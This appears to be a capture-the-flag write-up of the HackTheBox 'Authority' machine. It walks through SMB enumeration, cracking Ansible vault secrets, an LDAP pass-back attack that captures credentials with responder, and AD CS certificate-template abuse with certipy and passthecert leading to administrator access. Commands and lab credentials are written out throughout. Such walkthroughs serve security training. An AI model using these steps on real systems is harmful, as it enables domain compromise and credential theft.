Kariebi Victor

Authority -[ADCS attack, LDAP Passback attack, Ansible]

Authority Start by adding the FQDN to your host file: echo "- authority.htb" | sudo tee -a /etc/hosts Reconnaissance with Nmap nmap -sCV -T4 -p- PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: IIS Windows Server |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time:-:26:29Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: othername: UPN:-, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB | Not valid before:-T23:03:21 |_Not valid after: -T23:13:21 |_ssl-date:-T02:28:01+00:00; +4h00m00s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: othername: UPN:-, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB | Not valid before:-T23:03:21 |_Not valid after: -T23:13:21 |_ssl-date:-T02:27:57+00:00; +3h59m59s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: othername: UPN:-, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB | Not valid before:-T23:03:21 |_Not valid after: -T23:13:21 |_ssl-date:-T02:27:58+00:00; +3h59m59s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: othername: UPN:-, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB | Not valid before:-T23:03:21 |_Not valid after: -T23:13:21 |_ssl-date:-T02:27:58+00:00; +4h00m00s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found 8443/tcp open ssl/https-alt |_http-title: Site doesn't have a title (text/plain;charset=UTF-8). | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 200 | Content-Type: text/html;charset=ISO-8859-1 | Content-Length: 82 | Date: Tue, 15 Aug 2023 02:26:37 GMT | Connection: close | | GetRequest: | HTTP/1.1 200 | Content-Type: text/html;charset=ISO-8859-1 | Content-Length: 82 | Date: Tue, 15 Aug 2023 02:26:35 GMT | Connection: close | | HTTPOptions: | HTTP/1.1 200 | Allow: GET, HEAD, POST, OPTIONS | Content-Length: 0 | Date: Tue, 15 Aug 2023 02:26:36 GMT | Connection: close | RTSPRequest: | HTTP/1.1 400 | Content-Type: text/html;charset=utf-8 | Content-Language: en | Content-Length: 1936 | Date: Tue, 15 Aug 2023 02:26:44 GMT | Connection: close | HTTP Status 400 | RequestHTTP Status 400 |_ RequestType Exception ReportMessage Invalid character found in the HTTP protocol [RTSP/1.00x0d0x0a0x0d0x0a...]Description The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=- | Not valid before:-T00:01:15 |_Not valid after: 9389/tcp open 47001/tcp open -T11:39:39 mc-nmf .NET Message Framing http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open msrpc Microsoft Windows RPC 49688/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49689/tcp open msrpc Microsoft Windows RPC 49691/tcp open msrpc Microsoft Windows RPC 49692/tcp open msrpc Microsoft Windows RPC 49704/tcp open msrpc Microsoft Windows RPC 49706/tcp open msrpc Microsoft Windows RPC 49715/tcp open msrpc Microsoft Windows RPC 56095/tcp open msrpc Microsoft Windows RPC Host script results: | smb2-time: | date:-T02:27:42 |_ start_date: N/A |_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m58s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Aug 14 23:28:01 2023 -- 1 IP address (1 host up) scanned in 101.97 seconds Service Enumeration SMB [139/445] I like to start out most windows boxes by checking out the smb server for shares we have anonymous access into. Using smbclient: ⚡otsutsukisec: smbclient -L //-/ Password for [WORKGROUP\krill]: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Department Shares Disk Development Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to- failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available I can connect to the Department Shares share but don't have enough permissions to list the content of this directory ⚡otsutsukisec: smbclient //-/'Department Shares' Password for [WORKGROUP\krill]: Try "help" to get a list of possible commands. smb: \> ls NT_STATUS_ACCESS_DENIED listing \* smb: \> Trying to connect to the other non-default share Development was successful, and I can also list the content of this directory. ⚡otsutsukisec: smbclient //-/Development Password for [WORKGROUP\krill]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Mar 17 14:20:38 2023 .. D 0 Fri Mar 17 14:20:38 2023 Automation D 0 Fri Mar 17 14:20:40 2023 - blocks of size- blocks available To easily access this share, I mounted it on my attack machine > mkdir /tmp/mount > sudo mount //-/Development /tmp/mount/ > cd /tmp/mount Inside this share there is a directory called Automation which also contains a directory called Ansible . List the content of Ansible , I got the following files. Looking into the ADCS directory, I immediately know this is an ansible collection because of the file structure and the .yml files. Also read the requirements.yml file. Basically Ansible is an automation platform used to configure systems, deploy software, cloud provisioning and nearly anything a systems administrator does on a weekly or daily basis. :) It is possible to find hard-coded credentials in the configuration file of this ansible collection; Found the passphrase for the Certificate Authority key but currently don't have any use for it, so I'd just keep it for later. Now moving on to the next share LDAP , this is also another ansible collection Moving on to the PWM share. Wait a minute and also display the text /pwn 🤔, the nmap result shows there is a service running on port 8443 This is also another ansible collection Reading the content of the ansible.cfg file displays a username svc_pwm Found winrm credentials in the ansible_inventory file, tried to login using winrm but they weren't valid credentials :( Looking into the defaults/ directory I found ansible vault tokens in the main.yml file I can use john-the-ripper to crack the vault password; I need to clean up the spaces in the hash and also convert it to a format that is compatible with john cat hash | tr -d " " > hash.ansible ansible2john hash.ansible > hash1 Now I can successfully crack the hash john --wordlist=/opt/rockyou.txt hash1 got the clear-text password !@#$%^&* Using the password gotten, we can easily decrypt the other tokens so we have the following values pwm_admin_login: svc_pwm pwm_admin_password: pWm_@dm!N_!23 ldap_admin_password: DevT3st@123 HTTP [8443] The website on this port is a password manager application. Trying to authenticate using the credentials I got from the vault, I got an error It seems the ldap server is having issues binding with the ldap server which was specified in the server's configuration file. Clicking on Configuration Manager and providing the password pWm_@dm!N_!23 , Successfully authenticated. we can either Import or Download and existing configuration file I downloaded the current configuration file in other to have a template to make changes on before importing it back to the server. Going through the config file, I noticed a field that included the ldap server url. We can perform a LDAP Pass-back Attack , since we have access to modify the content of the configuration file LDAP Pass-back attacks can be performed when we gain access to a device's configuration where the LDAP parameters are specified. In an LDAP Pass-back attack, we can modify the IP to our IP and then test the LDAP configuration, which will force the device to attempt LDAP authentication to our rogue device. We can intercept this authentication attempt to recover the LDAP credentials. In other to carry out this attack, we can use responder sudo responder -I tun0 Before Importing the configuration file to the server, we need to change the LDAP url parameter to the IP address of our attack machine After you upload the configuration file, the server restarts and after a couple seconds, you should get a connection attempt on responder which reveals the clear text password of the svc_ldap user. svc_ldap:lDaP_1n_th3_cle4r! Initial-Foothold I created a word-list using the discovered credentials, then used crackmapexec to brute-force for winrm access. using the ldap credentials gotten, we can gain winrm access using evil-winrm Post Exploitation Remember the ansible collection ADCS that was found in the Development smb share, there is a high possibility that an ADCS(Active Directory Certificate Service was installed on this server. We can use a tool called certipy to enumerate for vulnerable certificates. Certipy is an offensive tool for enumerating and abusing Active Directory Certificate Services (AD CS). If you're not familiar with AD CS and the various domain escalation techniques. First, we need to check if any certificate template is vulnerable > certipy find -vulnerable -stdout -u- -p 'lDaP_1n_th3_cle4r!' -dc-ip- Found a certificate authority AUTHORITY-CA , so there's definitely an ADCS installed on this server Also found a certificate template. CorpVPN certipy flags a vulnerability at the bottom AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication Next we need to add a new computer to the domain in other to generate the certificate of an arbitrary user (in this case, the administrator). We can use impacket-addcomputer to achieve this. > impacket-addcomputer 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' -method LDAPS -computer-name 'FIRE-PC' -computer-pass 'fire@123' That completed successfully; now we can request for the administrator's certificate > certipy req -u-- -p 'fire@123' -target authority.htb -template CorpVPN -ca AUTHORITY-CA -upn we need to extract key and cert from the pfx file using certipy > certipy cert -pfx administrator.pfx -nokey -out user.crt > certipy cert -pfx administrator.pfx -nocert -out user.key Finally, using PassTheCert.py we can change the administrator's password and gain elevated access using their account > python3 passthecert.py -action modify_user -crt user.crt -key user.key -domain authority.htb -dc-ip- -target administrator -new-pass Using evil-winrm again, we can gain access into the machine as administrator > evil-winrm -i- -u administrator -p 'HfJazLpr6UEbMmCdAJtZQSqQxC8dEKsl'

Scheduled maintenance